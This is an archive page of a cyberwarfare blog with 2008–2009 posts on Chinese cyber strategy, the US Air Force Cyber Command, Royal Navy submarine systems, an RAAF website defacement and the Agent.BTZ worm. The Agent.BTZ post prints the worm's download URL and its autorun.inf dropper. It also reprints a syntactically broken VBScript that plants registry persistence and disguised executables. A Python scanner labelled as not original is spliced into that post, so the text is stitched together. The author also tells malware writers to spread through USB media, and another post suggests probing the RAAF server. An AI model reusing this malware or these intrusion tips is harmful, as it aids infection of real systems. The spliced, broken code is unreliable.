Cyberwarfare Magazine

Warfare in the Information Age

Posts Tagged ‘Military’

The Past, Present and Future of Chinese Cyber Operations

leave a comment »

Out of nowhere, here’s an article I wrote for the Canadian Military Journal. China, as one of many alleged actors on the frontier of cyber espionage, is best understood by briefly examining the past century, how it influences contemporary cyber operations attributed to Chinese-based actors, and how those operations could be used against the Canadian Armed Forces in a potential Southeast Asian conflict.

See the full article here: https://www.academia.edu/7633668/The_Past_Present_and_Future_of_Chinese_Cyber_Operations; or

here: http://www.journal.forces.gc.ca/vol14/no3/PDF/CMJ143Ep26.pdf


RAAF website defaced

with 3 comments

Atul Dwivedi, an Indian hacker, paid a visit to the Royal Australian Air Force (RAAF) last Monday by defacing their website.

This incident comes amid a rise in violence targeted towards Indian nationals in Australia, and Dwivedi apparently protested this situation by leaving a message on the website:

“This site has been hacked by Atul Dwivedi. This is a warning message to the Australian government. Immediately take all measures to stop racist attacks against Indian students in Australia or else I will pawn all your cyber properties like this one.”

Racist incident in Australia against Indian students has increased in the last months


The site is now up and running as normal. Of course, the webserver wasn’t connected to any internal network and didn’t contain any classified information, according to a spokeswoman:

“No sensitive information was compromised as the air force internet website is hosted on an external server and, as such, does not hold any sensitive information.”[1]

Microsoft products are used in pretty much every Western armed force, so it’s safe to assume the webserver used by the RAAF is probably running IIS. Of course, IIS implies a Windows machine, and a Windows Server machine means that everything is almost certainly Microsoft based. We can now verify those claims: according to David M Williams from ITWire[2], the website is hosted through Net Logistics, an Australian hosting company. The aforementioned article tries to explain the hack with the use of exploits, which might have been the way Dwivedi did it, but the analysis is quite simple and lacks depth. The article still has an excellent link to a blog detailing the WebDAV exploit; see below for the link.

It’s not impossible to think that Dwivedi might also have tricked someone into giving out too much information. Social engineering can do a lot and is usually easier than technical exploits; The Art of Deception by Kevin Mitnick should convince most people of that. Someone could look up people in the RAAF on Facebook or another social networking site and then try to pose as them.

Then also, why not look for the FTP server? And God knows what else the server is running; maybe an SMTP server too (and probably it does). Now I wouldn’t suggest doing this, but running a port scan would probably reveal a lot of information. Moreover, web vulnerability tools like Nikto could help find misconfigured ASP settings or forgotten test/setup pages and files. Up to that point, only two things are important: information gathering and imagination.

See also:

“Hacker breaks into RAAF website”, AAP, Brisbane Times, July 16, 2009, http://news.brisbanetimes.com.au/breaking-news-national/hacker-breaks-into-raaf-website-20090716-dmrn.html (accessed on 2009-07-17)

“WebDAV Detection, Vulnerability Checking and Exploitation”, Andrew, SkullSecurity, May 20, 2009, http://www.skullsecurity.org/blog/?p=285 (accessed on 2009-07-17)


[1] “Indian hacks RAAF website over student attacks”, Asher Moses, The Sydney Morning Herald, July 16, 2009, http://www.smh.com.au/technology/security/indian-hacks-raaf-website-over-student-attacks-20090716-dmgo.html (accessed on 2009-07-16)

[2] “How did Atul Dwivedi hack the RAAF web site this week?”, David M Williams, ITWire, July 17, 2009, http://www.itwire.com/content/view/26344/53/ (accessed on 2009-07-16)

Submarine Command System

with one comment

A press release from BAE Systems announced the installation of the Submarine Command System Next Generation (SMCS NG) on twelve nuclear submarines of the Royal Navy, effectively ending the conversion of the seven Trafalgar-class submarines, four Vanguard-class submarines and one Swiftsure-class submarine[1].

The new command system is based on COTS hardware and software products. It uses mainstream PCs and Windows as supporting components. All computers are connected on a LAN using Ethernet over fiber-optic cable. According to The Register, the system will mostly be based on Windows XP[2], although it was initially decided it would be based on Windows 2000.

The role of this system is to store and compile data from various sensors in order to present tactical information for the leadership. It also controls the weaponry:

SMCS NG is designed to handle the growing volume of information available in modern nuclear submarines and to control the sophisticated underwater weapons carried now and in the future. Its core capability is the assimilation of sensor data and the compilation and display of a real time tactical picture to the Submarine Command Team[3].

The SMCS NG system is the descendant of the previous SMCS system, proposed back in 1983 when the U.K. decided to build a new command system for the then-new Trident class. Before that, all electronics were custom built by Ferranti. The SMCS would use COTS material to minimize costs and become less dependent on one company. The architecture of the command system was modular and was written in Ada 83. The core of the system contains an Input/Output computer node, a computer that processes data from the sensors and weapons systems. There is also the central node, which is used for processing all the data. Each central node is duplicated to provide fault tolerance, with each being dual modular redundant, which means that hardware components work in parallel in case one becomes defective. The dual central nodes are connected to each other, and they are also connected to Multi Function Consoles, a Main Tactical Display and two Remote Terminals, which provide the Human Computer Interface. The first phase of the project was to install the SMCS on the Vanguard-class submarines.

In 1990, it was decided to extend the SMCS to other submarine classes and that the new command system would use UNIX as its base operating system. Because of the Ada architecture, problems arose when the technicians tried to map the SMCS to run-time processes of UNIX. Solaris and SPARC machines were finally selected for Multi Function Consoles. The central nodes kept their original architecture in Ada.

SMCS Multi Function Monitor in a Vanguard Class Submarine


In 2000, the project was completely owned by BAE Systems and the move from SPARC computers to PCs was made. The switch of operating system was more difficult, as management preferred Windows while the engineers promoted the use of UNIX variants such as BSD, Linux or Solaris. The engineers’ main argument was that with UNIX it would be possible to remove all the extra code unneeded for the submarine’s operations, thus making it more secure. However, the management point of view prevailed, and thus the “Windows for Warships” label was created.

Windows was chosen even after the USS Yorktown accident of 1997 in the US. The ship was crippled after the sysadmin entered invalid data into the database through the Remote Database Manager.[4]

Insert any jokes about Windows controlling nuclear subs into the comments. Thank you.

Clippy Launch Warning Blue Screen of Death

See also:

“SMCS”, AllExperts, http://en.allexperts.com/e/s/sm/smcs.htm (accessed on December 17, 2008)

“Submarine Command System (SMCS)”, Ultra Electronics, http://www.ultra-ccs.com/systems/smcs/ (accessed on December 17, 2008)

“Operating Systems Contracts, Trusted Software?”, Richard Smedly, Linux Format, March 2005, http://www.linuxformat.co.uk/pdfs/LXF64.pro_war.pdf (accessed on December 17, 2008)

“Development Drivers in Modern Multi-function Consoles and Cabinets”, Armed Forces International, http://www.armedforces-int.com/categories/military-consoles-and-cabinets/development-drivers-in-modern-multifunction-consoles-and-cabinets.asp (accessed on December 17, 2008)


[1] “Royal Navy’s Submarine Command System Installation Programme Completes Ahead of Time”, BAE Systems, December 15, 2008, http://www.baesystems.com/Newsroom/NewsReleases/autoGen_108111514515.html (accessed on December 17, 2008)

[2] “Royal Navy completes Windows for SubmarinesTM rollout”, Lewis Page, The Register, December 16, 2008, http://www.theregister.co.uk/2008/12/16/windows_for_submarines_rollout/ (accessed on December 17, 2008)

[3] Ibid.

[4] “Operating Systems Contracts, Trusted Software?”, Richard Smedly, Linux Format, March 2005, p. 72

Written by Jonathan Racicot

December 17, 2008 at 8:00 pm

LATimes: Agent.BTZ Might be Concerted Cyber-Attack

leave a comment »

The Los Angeles Times reports that the Agent.BTZ worm spreading through U.S. Army networks might be a coordinated attack originating from Russia[1].

The U.S. Central Command is now infected with the worm, and a highly classified network has also been hit.

It is unclear whether the author of the article thinks that an infection is the same thing as an ‘attack’, though. From the article:

“Military electronics experts have not pinpointed the source or motive of the attack and could not say whether the destructive program was created by an individual hacker or whether the Russian government may have had some involvement.”

This infection was reported at the beginning of the month. This might just be sensationalism or complete ignorance from the author, who might think that an infection by a worm made in Russia is a deliberate attack.

Officials would not describe the exact threat from agent.btz, or say whether it could shut down computers or steal information. Some computer experts have reported that agent.btz can allow an attacker to take control of a computer remotely and to take files and other information from it.

Then maybe they should just call Symantec or F-Secure or, even better, Google it… or this if they are having a hard time.

See also:

“U.S Army Infected by Worm”, Jonathan Racicot, Cyberwarfare Magazine, November 11, 2008, https://cyberwarfaremag.wordpress.com/2008/11/20/us-army-infected-by-worm/



[1] “Cyber-attack on Defense Department computers raises concerns”, Julian E. Barnes, Los Angeles Times,  November 28, 2008, http://www.latimes.com/news/nationworld/iraq/complete/la-na-cyberattack28-2008nov28,0,230046.story (accessed on November 28, 2008)

Written by Jonathan Racicot

November 28, 2008 at 1:23 pm

U.S Army Infected by Worm

with one comment

Wired reports that the U.S. Army network is under assault by a variant of the SillyFDC worm called Agent-BTZ[1]. In order to contain the infection, the U.S. Strategic Command has banned the use of all portable media on its network; this includes USB keys, CDs, flash cards, floppies etc. Both the SIPRNet and NIPRNet are affected by this directive.

The SillyFDC worm infects systems through replication, i.e. by copying itself to various locations such as these folders[2]:

  • %System%
  • %Windir%
  • %Temp%
  • %UserProfile%
  • %ProgramFiles%
  • %SystemDrive%
  • %CommonProgramFiles%
  • %CurrentFolder%

Computer Virus Looming


It will also try to copy itself to any drive connected to the machine by scanning drives A:\ to Z:\, which is why the U.S. Army is banning the use of portable media for the time being. According to F-Secure, who first discovered the worm[3], the variant in question will also create these files[4]:

  • %windir%\system32\muxbde40.dll
  • %windir%\system32\winview.ocx
  • %temp%\6D73776D706461742E746C62FA.tmp
  • %windir%\system32\mswmpdat.tlb

It will then install itself into the registry to make sure the worm starts every time the computer is booted. It will also attempt to download a JPG file from http://worldnews.ath.cx/update/img0008/%5BREMOVED%5D.jpg and create an AUTORUN.INF file on each drive on the computer, which contains the following:

[autorun]
open=
shell\open=Explore
shell\open\Command=rundll32.exe .\\[RANDOM].dll,InstallM
shell\open\Default=1

[RANDOM] is a randomly generated filename for the malicious DLL. Each time a new partition or a new drive is plugged in, Agent.BTZ will infect it immediately.
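As an added example that is not part of the original post, the following Python scanner parses an autorun.inf body the way the post describes and flags the Agent.BTZ pattern: a shell\open verb whose command loads a DLL through rundll32.exe, made the double-click default. The two sample files inside it are constructed for the demonstration, and the only keys it knows are the standard autorun.inf keys shown above.

```python
"""Offline autorun.inf scanner for the Agent.BTZ propagation pattern."""
import re
from typing import Dict, List, Optional

# Constructed sample: the AUTORUN.INF body quoted in the post (Agent.BTZ).
AGENT_BTZ_AUTORUN = r"""[autorun]
open=
shell\open=Explore
shell\open\Command=rundll32.exe .\\[RANDOM].dll,InstallM
shell\open\Default=1
"""

# Constructed sample: a harmless autorun.inf that only sets a label and an icon.
BENIGN_AUTORUN = r"""[autorun]
label=Field Photos
icon=photos.ico
"""

# autorun.inf keys that make Explorer execute something: open=, shellexecute=,
# and any shell\<verb>\command= line. The worm uses the shell\open verb.
RUN_KEY_RE = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$")


def parse_autorun(text: str) -> Dict[str, str]:
    """Return {lowercased key: value} for the [autorun] section.

    Mirrors how Windows reads the file: section and key names are
    case-insensitive, whitespace around '=' is ignored, ';' starts a comment.
    """
    entries: Dict[str, str] = {}
    section: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        entries[key.strip().lower()] = value.strip()
    return entries


def referenced_dll(command: str) -> Optional[str]:
    """Extract the DLL file name from a 'rundll32.exe <path>.dll,<export>' command."""
    m = re.search(r"rundll32(?:\.exe)?\s+([^\s,]+\.dll)", command, re.IGNORECASE)
    if not m:
        return None
    # The path is relative to the drive root; keep only the last path component.
    return re.split(r"[\\/]", m.group(1))[-1]


def suspicious_reasons(entries: Dict[str, str]) -> List[str]:
    """Explain why a parsed autorun.inf looks like the dropper pattern; [] if clean."""
    reasons: List[str] = []
    for key, value in entries.items():
        if not RUN_KEY_RE.match(key) or not value:
            continue
        dll = referenced_dll(value)
        if dll:
            reasons.append(f"{key} loads {dll} through rundll32.exe")
        elif re.search(r"\.(exe|com|scr|pif|bat|cmd|vbs|js)(\s|$)", value.lower()):
            reasons.append(f"{key} launches a program: {value}")
    # shell\open=Explore gives the verb a familiar label, and Default=1 makes it
    # the action taken on double-click, so the DLL runs when the drive is opened.
    if entries.get("shell\\open\\default") == "1" and "shell\\open\\command" in entries:
        reasons.append("shell\\open\\Default=1 makes the custom verb the double-click action")
    return reasons


def scan_autorun_text(text: str) -> List[str]:
    """Parse one autorun.inf body and return the list of findings."""
    return suspicious_reasons(parse_autorun(text))


if __name__ == "__main__":
    for name, body in (("Agent.BTZ sample", AGENT_BTZ_AUTORUN),
                       ("benign sample", BENIGN_AUTORUN)):
        findings = scan_autorun_text(body)
        print(name, "->", "SUSPICIOUS" if findings else "clean")
        for reason in findings:
            print("   ", reason)
```

To check a real drive, read its root autorun.inf into a string and pass it to scan_autorun_text; with the autorun facility disabled as advised below, the file is still worth scanning because the worm writes it to every drive it infects.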

The SillyFDC worm doesn’t have any payload, as it only replicates itself through the systems it finds using physical media only. But its variant, Agent.BTZ, is a known Trojan dropper. A dropper is the kind of Trojan that will look to download and execute other malware. It’s surprising that it found its way into the U.S. Army network. So that might be a tip for any worm/Trojan writer: add physical media replication to your malware like in the good ol’ days before e-mail, as it seems sending it by e-mail or clickjacking is pretty well filtered in military networks, but peripherals such as USB keys are still often used by personnel. And this will surely open the eyes of the network admins of the U.S. Army: scan anything plugged into the network.

Also, Graham Cluley, senior technology consultant at Sophos advises:

“… that users disable the autorun facility of Windows so removable devices such as USB keys and CD ROMs do not automatically launch when they are attached to a PC”

With whom I agree.

Update:

Since so many people asked me about this worm, I looked deeply into the Internet and found this code, which seems to be part of the script of the SillyFDC worm (that’s the best I could do for now). This script basically copies files from one directory to another, renames the core of the worm, puts it into another directory and adds registry keys. I cannot confirm this, as I found it on an Indonesian blog, so if anyone can look into this, please let me know. Thank you. Blog: http://morphians.wordpress.com/category/uncategorized/

Dim fs,rg

Set fs = CreateObject("scripting.filesystemobject")
Set rg = CreateObject("wscript.shell")

On Error Resume Next

rg.RegWrite "HKCR\.vbs\", "VBSFile"
rg.RegWrite "HKCU\Control Panel\Desktop\SCRNSAVE.EXE", "C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com"
rg.RegWrite "HKCU\Control Panel\Desktop\ScreenSaveTimeOut", "30"
rg.RegWrite "HKCR\MSCFile\Shell\Open\Command\", "C:\WINDOWS\pchealth\Global.exe"
rg.RegWrite "HKCR\regfile\Shell\Open\Command\", "C:\WINDOWS\pchealth\Global.exe"
rg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\", "C:\WINDOWS\system32\dllcache\Default.exe"
rg.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\", "C:\WINDOWS\system32\dllcache\Default.exe"
rg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\", "C:\WINDOWS\system\KEYBOARD.exe"
rg.RegWrite "HKEY_CLASSES_ROOT\MSCFile\Shell\Open\Command\", "C:\WINDOWS\Fonts\Fonts.exe"
rg.RegWrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\DisplayName", "Local Group Policy"
rg.RegWrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\FileSysPath", ""
rg.RegWrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\GPO-ID", "LocalGPO"
rg.RegWrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\GPOName", "Local Group Policy"
rg.RegWrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\SOM-ID", "Local"
rg.RegWrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\Parameters", ""
rg.RegWrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\Script", "C:\WINDOWS\Cursors\Boom.vbs"
rg.RegWrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\DisplayName", "Local Group Policy"
rg.RegWrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\FileSysPath", ""
rg.RegWrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\GPO-ID", "LocalGPO"
rg.RegWrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\GPOName", "Local Group Policy"
rg.RegWrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\SOM-ID", "Local"
rg.RegWrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\Parameters", ""
rg.RegWrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\Script", "C:\WINDOWS\Cursors\Boom.vbs"
rg.RegWrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\DisplayName", "Local Group Policy"
rg.RegWrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\FileSysPath", ""
rg.RegWrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\GPO-ID", "LocalGPO"
rg.RegWrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\GPOName", "Local Group Policy"
rg.RegWrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\SOM-ID", "Local"
rg.RegWrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\Parameters", ""
rg.RegWrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\Script", "C:\WINDOWS\Cursors\Boom.vbs"

If Not fs.FileExists("C:\WINDOWS\Fonts\Fonts.exe") Then
	fs.CopyFile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\Fonts\Fonts.exe")
If Not fs.FileExists("C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com") Then
	fs.CopyFile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com")
If Not fs.FileExists("C:\WINDOWS\pchealth\Global.exe") Then
	fs.CopyFile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\pchealth\Global.exe")
If Not fs.FileExists("C:\WINDOWS\system\KEYBOARD.exe") Then
	fs.CopyFile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\system\KEYBOARD.exe")
If Not fs.FileExists("C:\WINDOWS\system32\dllcache\Default.exe") Then
	fs.CopyFile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\system32\dllcache\Default.exe")
If Not fs.FileExists("C:\windows\system32\drivers\drivers.cab.exe") Then
	fs.CopyFile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\system32\drivers\drivers.cab.exe ")
If Not fs.FileExists("C:\windows\media\rndll32.pif ") Then
	fs.CopyFile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\media\rndll32.pif")
If Not fs.FileExists("C:\windows\fonts\tskmgr.exe") Then
	fs.CopyFile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\fonts\tskmgr.exe")

See also:

“US Army bans USB devices to contain worm”, John Leyden, The Register, November 20, 2008, http://www.theregister.co.uk/2008/11/20/us_army_usb_ban/ (accessed on November 20, 2008)


[1] “Under Worm Assault, Military Bans Disks, USB Drives”, Noah Shachtman, Danger Room, Wired, http://blog.wired.com/defense/2008/11/army-bans-usb-d.html (accessed on November 20, 2008)

[2] “W32.SillyFDC”, Symantec, http://securityresponse.symantec.com/security_response/writeup.jsp?docid=2006-071111-0646-99&tabid=1 (accessed on November 20, 2008)

[3] “Troj/Agent-EMB”, Sophos, http://www.sophos.com/security/analyses/viruses-and-spyware/trojagentemb.html (accessed on November 20, 2008)

[4] “F-Secure Malware Information Pages: Worm:W32/Agent.BTZ”, F-Secure Corporation, http://www.f-secure.com/v-descs/worm_w32_agent_btz.shtml (accessed on November 20, 2008)

Written by Jonathan Racicot

November 20, 2008 at 5:39 pm

Chinese Cyber Warfare to Gain Military Superiority

with 2 comments

Since the 70s, when Deng Xiaoping was the head of China, the People’s Liberation Army has tried to modernize itself and cut its size in order to become more efficient. Still, China remains behind militarily, even though its defense budget is the second largest on the planet after the United States, at US$57 billion in 2008[1]. According to an article published in Culture Mandala, China could boost its cyber warfare capabilities in order to compensate for its technological backwardness.

This started as early as 2003, when it deployed its first cyber warfare units, the “zixunhua budui”[2]. Since then, many attacks have been attributed to China, such as Operation Titan Rain in 2003[3]. China hopes that by using asymmetrical warfare, such as information warfare and cyber warfare, it might level the playing field with other modern armies.

Michael Vickers, Senior Vice President for Strategic Studies at the Center for Strategic and Budgetary Assessments, declared that “a Chinese attack on Taiwan could entail special operations and cyber attacks on U.S. regional bases in Japan and South Korea, and might even include cyber attacks on the U.S. homeland that target the U.S. financial, economic, energy, and communications infrastructure”[4]. In the same document, we can read:

“One way to assess this risk is to ask whether a cyber attack by China launched a few days in advance of a clash could prevent U.S. carrier battle groups from deploying to the Taiwan Straits. Launching the attacks too early would create the risk of discovery and countermeasures.”[5]

China could boost its cyber warfare capabilities in order to compensate for their technological backwardness


It is clear to me that a nation that is technologically behind modern armies has every advantage in developing asymmetrical warfare. We can assess its effectiveness in Afghanistan and Iraq. And cyber warfare is a perfect way to destabilize modern armies that rely on technology in their daily operations. But this is far from easy for either side, as talented individuals and highly skilled hackers are needed to develop this kind of warfare. Terrorists and small groups are unlikely to develop a high quality cyber warfare force, although they can still be effective. China, on the other hand, can, and is smart to do it. After all, if a force can disable the enemy’s communications networks, such as GPS, e-mail and phone networks, it can make a strong army useless. Like a strong man or woman: if the brain cannot reach the muscles through the nervous system, the body is powerless…

See also:

“How China Will Use Cyber Warfare To Leapfrog in Military Competitiveness”, Jason Fritz, Culture Mandala, Vol. 8, No. 1, October 2008

“China’s Military Modernization and Its Impact on the United States and the Asia-Pacific”, U.S.-China Economic and Security Review Commission, 110th Cong., 1st Sess., March 29-30, 2007


[1] “How China Will Use Cyber Warfare To Leapfrog in Military Competitiveness”, Jason Fritz, Culture Mandala, Vol. 8, No. 1, October 2008, p. 29

[2] “Trojan Dragon: China’s Cyber Threat”, John J. Tkacik, Jr., The Heritage Foundation, February 8, 2008, http://www.heritage.org/Research/asiaandthepacific/bg2106.cfm#_ftn6 (accessed November 3, 2008)

[3] “Titan Rain – how Chinese hackers targeted Whitehall”, Richard Norton-Taylor, The Guardian, September 5, 2007, http://www.guardian.co.uk/technology/2007/sep/04/news.internet (accessed November 3, 2008)

[4] China’s Military Modernization and Its Impact on the United States and the Asia- Pacific, U.S.-China Economic and Security Review Commission, 110th Cong, 1st Sess., March 29-30, 2007, p. 2

[5] Ibid. p.144

A Brief Overview of the Cyber Command

leave a comment »

As more and more of the infrastructure of modern societies gets internetworked, the more the authorities take notice of the possible disasters that could happen if those networks were attacked and controlled by malicious individuals. Based on that, the U.S. Secretary of the Air Force announced the creation of AFCYBER, the Air Force Cyber Command, whose mission “will be to provide combat ready forces trained and equipped to conduct sustained global operations in and through cyberspace, fully integrated with air and space operations”[1]. Let’s go deeper into that interesting new agency and try to see if it can actually match the challenges of this century.

Origins

U.S Air Force Cyber Command Shield


In February 2003, the United States government released a 76-page document titled “The National Strategy to Secure Cyberspace”. This document recommended numerous solutions and actions to better protect the American cyberspace. Among these actions, one recommends to “Improve coordination for responding to cyber attacks within the U.S. national security community”[2]. Based on that recommendation, the former U.S. Secretary of the Air Force, Michael W. Wynne, decided to establish a cyberspace command. He also stated:

“The aim is to develop a major command that stands alongside Air Force Space Command and Air Combat Command as the provider of forces that the President, combatant commanders and the American people can rely on for preserving the freedom of access and commerce, in air, space and now cyberspace.”[3]

It was then decided that the 67th Network Warfare Wing and some elements of the 8th Air Force would serve as the core of the new command. It’s interesting to note that the goal of the 67th is to “organize, train, and equip cyberspace forces to conduct network defense, attack, and exploitation.” Therefore, the Air Force already had a unit trained to conduct cyberspace operations, and more interestingly, this unit was also trained to conduct attacks, not only defensive operations. Thus, in 2006 the Air Force Cyberspace Command (Provisional) unit was put into place, but it faced many difficulties. The first was to define the term “cyberspace”, define the command’s operations, find a location to base the unit, then find the personnel and define all their functions, train them and organize the unit. Those challenges were perfectly summarized when Maj. Gen. William T. Lord answered a Slashdot user about the location of the new command:

“I would hope that no matter where it was located, we would still be able to attract the talent needed to work in this exciting command and that all communities see the need to protect this domain.”[4]

Attracting specialists and talented individuals is getting harder and harder. The private technology sector is still offering, for now at least, good opportunities for graduates. Maybe that’s why AFCYBER touted its creation and development with TV ads and advertisements all over the web. A great mistake, as it opened it to greater scrutiny from the public and observers, who would now be able to witness the success or the failure of the new command…

And not only did it have difficulties organizing itself, it was in competition with other similar services of the military, with the Navy (Naval Network Warfare) and the Army already having such organizations, not to mention organizations such as the National Security Agency (NSA).

Even with the aforementioned difficulties, “We’ve figured all that out”, said General Lord in October this year. “We’ve outlined how to organize cyber forces, i.e., what capabilities fall into, or not into, a cyber organization”[5].

Dismay

The optimism expressed in Lord’s comment was hard to share. One month earlier, the establishment of the Cyber Command had been suspended and the transfers of units halted[6]. In June, different actors were still discussing whether the command should concentrate on defense and protection or whether it should also conduct offensive operations[7]. The ever-growing size of the command and the confusion about which operations the unit was to conduct were slowing any progress, all this amid numerous other Air Force scandals about nuclear management, which later caused Wynne to resign from his post.

As of October 8, 2008, the Air Force decided that the Cyber Command will finally be a numbered unit under the Air Force Space Command, as told by Chief of Staff Gen. Norton A. Schwartz (see previous post “U.S Air Force Cyber Command is Working on a new Roadmap”, October 24, 2008). After 2 years, it seems that very little has been accomplished. We still have no idea of the structure, the size or even the mission of the unit. Although Colorado Springs[8] is apparently the preferred location, still no official location has been designated.

Will it work?

To be successful, any cyber unit must first emphasize constant research into new vulnerabilities in order to take the lead. It’s not just about looking at logs and waiting for an attack to occur. Any serious cyber warfare unit must cooperate with every actor in the computer security field, not only corporations or universities but also hobbyist groups, hackers and phreakers, in order to always have the initiative. As information is distributed at blazing speed throughout the net, and nothing stays secret for long, constant research is needed to discover new vulnerabilities and produce detailed analysis. Yet all those actors have been, as far as I know, ignored or forgotten.

U.S Navy Network Warfare Logo

Also, offense is the best defense. Why should a military organization concentrate only on defensive operations? It even goes against American principles of war, as it ignores the “Offensive” principle, leaving the initiative to the enemy. This is clearly not a sound decision; it ignores the basic concepts of warfare. I believe this is mostly due to a certain mentality in the military leadership, which still regards technology as support for troops instead of a fully fledged battlefield. This reasoning needs to change if we are to develop real cyber warfare operations. This is certainly something the Chinese understood.

I believe that this unit, if it becomes reality, will become an administratively bloated unit that misses the point. Quantity is never a remedy for a lack of quality. A small but highly trained and skilled unit of hackers can do a lot more than a legion of technicians. The important part of cyber warfare is always to stay ahead, since as soon as a hole or exploit is found, the enemy will patch it, making it obsolete, hence the need to find the next security vulnerability. Therefore, we don’t need a bigger bureaucracy, but more research, more cooperation with existing similar units and agencies, and a strong offensive capacity such as the Chinese government seems to have developed. The 67th Network Warfare Wing and the Naval Network Warfare Command would be able to implement those capacities with the appropriate funding and support.

This command, which seemed like an important step toward cyber warfare, now seems to have become a botched concept that is unlikely to be of any use, except for others to look upon and learn from its mistakes. The U.S. Navy also has plans for a Naval Cyber Command[9], but they have been a lot quieter about their project, maybe so they won’t suffer the same humiliation as their colleagues.

Conclusion

As governments realize the potential threats from a cyber war, agencies are organizing themselves to protect and defend their cyberspace. The U.S. Air Force effort was based on this premise and would have been a good idea… if anyone had had any idea of what they were talking about. Instead, it became, or will become, an administrative burden that failed and that will give no or little results. In the end, the “Cyber Command”, or what’s left of it, will be another organization whose goals will be the same as those of the other agencies already in place, with no new value or innovative ideas… While Western nations are struggling to grasp the concept of cyber warfare, others are developing a very well organized and effective effort to disrupt our systems. Cyber war is won by being a step ahead… and we’re not…


[1] Lt. Col. Paul Berg, “AFCYBER: What it will do and why we need it”, March 26, 2008, http://www.afcyber.af.mil/news/commentaries/story.asp?id=123091666 (accessed on October 24, 2008)

[2] The National Strategy to Secure Cyberspace, February 2003, U.S. Department of Homeland Security, p.13

[3] Staff Sgt. C. Todd Lopez, “8th Air Force to become new cyber command”, November 3, 2006, http://www.af.mil/news/story.asp?id=123030505 (accessed on October 24, 2008)

[4] “Air Force Cyber Command General Answers Slashdot Questions”, March 12, 2008,  http://interviews.slashdot.org/article.pl?sid=08/03/12/1427252 (accessed on October 26, 2008)

[5] Karen Petitt, “One year later: Provisional team lays groundwork for Air Force cyber mission assurance”, October 1, 2008, http://www.afcyber.af.mil/news/story.asp?id=123117666 (accessed on October 24, 2008)

[6] Bob Brewin, “Air Force suspends Cyber Command program”, August 12, 2008, http://www.nextgov.com/nextgov/ng_20080812_7995.php (accessed on October 24, 2008)

[7] Noah Shachtman, “Air Force Suspends Controversial Cyber Command”, August 13, 2008, http://blog.wired.com/defense/2008/08/air-force-suspe.html (accessed on October 24, 2008)

[8] Tom Roeder, “Air Force regroups command’s duties”, October 7, 2008, http://www.gazette.com/articles/command_41568___article.html/air_force.html (accessed on October 26, 2008)

[9] Lewis Page, “US Navy also planning Cyberwar Command”, October 14, 2008, http://www.theregister.co.uk/2008/10/14/us_navy_cyber_too/ (accessed on October 24, 2008)